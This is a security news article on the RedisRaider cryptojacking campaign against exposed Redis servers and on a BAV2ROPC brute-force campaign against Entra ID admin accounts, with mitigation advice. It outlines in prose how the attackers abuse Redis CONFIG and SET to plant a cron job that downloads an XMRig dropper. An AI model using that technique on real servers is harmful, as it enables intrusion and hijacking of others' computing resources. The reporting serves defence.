A newly uncovered Redis cryptojacking malware campaign is actively targeting publicly exposed Redis servers, using Go-based payloads to deploy the XMRig miner on vulnerable Linux systems.
Researchers at Datadog Security Labs have dubbed this campaign RedisRaider, warning that it’s designed to scan massive portions of the internet’s IPv4 space in search of Redis instances that can be exploited using legitimate configuration commands.
Once a Redis server is identified, the attackers issue an INFO command to confirm the system is Linux-based. If it is, they then exploit the SET command to inject a cron job. This tactic takes advantage of Redis’s default behaviors by changing its working directory to /etc/cron.d using the CONFIG command and writing a fake database file named apache.
This file contains a Base64-encoded shell script, which is scheduled to execute automatically. That script downloads the RedisRaider binary from a remote server—acting as a dropper for the XMRig cryptominer.
But this isn’t just a simple mining operation. RedisRaider also includes self-propagation functionality, scanning and infecting other Redis servers to expand the botnet. It even hosts a web-based Monero miner, allowing attackers to diversify their illicit revenue streams.
The malware’s creators have taken steps to avoid detection, using short key time-to-live (TTL) settings and altering Redis configuration parameters. These anti-forensics techniques make it harder for defenders to identify breaches and perform post-incident analysis.
Legacy Authentication Flaws Exploited in Separate Microsoft Entra ID Attack
While RedisRaider spreads through server misconfigurations, another campaign has been observed exploiting legacy authentication protocols in Microsoft Entra ID (formerly Azure AD).
Between March 18 and April 7, 2025, researchers at Guardz tracked a brute-force attack leveraging the outdated BAV2ROPC protocol (Basic Authentication Version 2 – Resource Owner Password Credential). This method sidesteps modern security layers like MFA and Conditional Access by preying on older systems that still support the protocol.
The attackers, believed to be operating from Eastern Europe and Asia-Pacific, focused their efforts on privileged admin accounts. Although regular users saw over 50,000 login attempts, more than 9,800 targeted attempts were made on admin accounts across 432 IP addresses in just 8 hours—showing a sharp focus on high-value targets.
Guardz’s analysis suggests a highly automated and concentrated brute-force strategy, using legacy authentication endpoints as a soft entry point. This is not unprecedented; Microsoft reported similar attacks in 2021 involving IMAP, POP3, and BAV2ROPC to bypass MFA and conduct large-scale business email compromise (BEC) operations.
Mitigation Steps to Defend Against RedisRaider and BAV2ROPC Attacks
To protect against Redis cryptojacking malware, system administrators should:
- Never expose Redis to the public internet.
- Use strong access controls and firewalls to limit access.
- Disable dangerous configuration commands where possible.
- Regularly monitor for unauthorized cron jobs or unusual processes.
For Entra ID environments, it’s critical to:
- Disable legacy authentication protocols like BAV2ROPC.
- Enforce Conditional Access policies to block outdated logins.
- Turn off SMTP AUTH in Exchange Online if unused.
These recent campaigns underscore the urgent need for organizations to close gaps in legacy systems and monitor for silent crypto-mining operations that may go unnoticed until it’s too late.
